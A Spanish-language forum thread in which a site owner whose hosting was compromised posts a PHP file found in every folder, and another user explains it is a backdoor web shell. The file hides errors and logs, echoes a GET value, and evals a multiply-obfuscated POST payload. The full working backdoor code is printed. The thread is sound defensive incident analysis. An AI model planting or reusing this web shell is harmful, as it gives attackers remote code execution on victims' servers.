elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Web hackeada, que hace este código?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Web hackeada, que hace este código?  (Leído 2,618 veces)
playman

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Web hackeada, que hace este código?
« en: 3 Diciembre 2012, 10:19 am »

Buenas, resulta que nos han hackeado el hosting, la razí y todas las subcarpetas contienen un archivo "default.php" con el siguiente código:

Código:
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) {
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}
exit;
?>

Qué se supone que hace? El primer if simplemente hace un echo y el elseif trata una cadena, la pone al reves, la cifra etc. no??

No entiendo mucho la utilidad del código.

Muchas gracias!!


En línea

isseu


Desconectado Desconectado

Mensajes: 325


°º¤ø,¸¸,El conocimiento es poder°º¤ø,¸¸,ø¤º°`°º¤ø,


Ver Perfil WWW
Re: Web hackeada, que hace este código?
« Respuesta #1 en: 3 Diciembre 2012, 13:04 pm »

Es un codigo maligno claramente ....
Puedes buscar en internet más casos parecidos al buscar (con las comillas) --> "eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); "
Mira el caso: http://wordpress.org/support/topic/cant-get-rid-of-a-redirecting-trojan
Hace 3 cosas:

Código
  1. @ini_set("display_errors",0);
  2. @ini_set("log_errors",0);
  3. @ini_set("error_log",0);

1.- La primeras 4 lineas sirven para no mostrar errores, si existe alguno no mostrarlo. También si existe algún error no logearlo, para que asi no te des cuenta tu.

Código
  1. if (isset($_GET['r'])) { print $_GET['r']; }

2.-  Si envia un GET 'r', lo imprime en la web, la verdad no se bien para que le serviria esto a alguien, tal vez como debugging o para xss, ni idea.

Código

3.- Claramente una especie de shell. eval() lo que hace es evaluar código PHP, y luego siguen un montón de funciones codificadoras, es decir, al enviar un POST  codificado se puede lograr que el servidor haga lo que quiere uno hacer. Por ej: conseguir un shell remoto con exec()

Elimina los archivos inmediatamente ... Y busca como los introdujeron, me parece que fue un ataque automatizado, nose porque....
PD: ¿de casualidad usas wordpress?



« Última modificación: 3 Diciembre 2012, 13:33 pm por isseu » En línea

playman

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Web hackeada, que hace este código?
« Respuesta #2 en: 3 Diciembre 2012, 13:57 pm »

Muchas gracias!!!

De todas maneras con la función eval, ya imprime por pantalla?

Igualmente no uso Wordpress, aunque es posible que en otra carpeta del servidor haya wordpress...

Bueno muchas gracias me quedó todo bastante claro :)
En línea

isseu


Desconectado Desconectado

Mensajes: 325


°º¤ø,¸¸,El conocimiento es poder°º¤ø,¸¸,ø¤º°`°º¤ø,


Ver Perfil WWW
Re: Web hackeada, que hace este código?
« Respuesta #3 en: 3 Diciembre 2012, 13:59 pm »

Con la funciona eval() ya puedes imprimir en pantalla, por eso lo encuentraba un poco raro. Puede ser que algunos servidores bloquen eval(), por lo que podría servir como debugging o para algún xss. No te preocupes lo de wordpress, era solo algo que escuche por ahí.
En línea

aixeiger

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: Web hackeada, que hace este código?
« Respuesta #4 en: 3 Diciembre 2012, 17:29 pm »

Citar
Elimina los archivos inmediatamente ... Y busca como los introdujeron, me parece que fue un ataque automatizado, nose porque....

jajaja
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
QUE HACE ESTE CODIGO??
Ingeniería Inversa
mauriporto 6 3,299 Último mensaje 17 Junio 2007, 10:25 am
por karmany
MOVIDO: Que hace exactamente este código???
PHP
дٳŦ٭ 0 1,785 Último mensaje 15 Abril 2009, 18:03 pm
por дٳŦ٭
¿Alguien sabe que hace este código?
Seguridad
Demenus 4 4,279 Último mensaje 15 Mayo 2010, 22:44 pm
por [L]ord [R]NA
alguien sabe que es lo que hace este codigo????
Desarrollo Web
Paul Young 3 2,513 Último mensaje 20 Julio 2012, 15:15 pm
por Spider-Net
que le hace falta este codigo en python
Scripting
YunTech 6 3,030 Último mensaje 5 Diciembre 2015, 19:24 pm
por YunTech
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines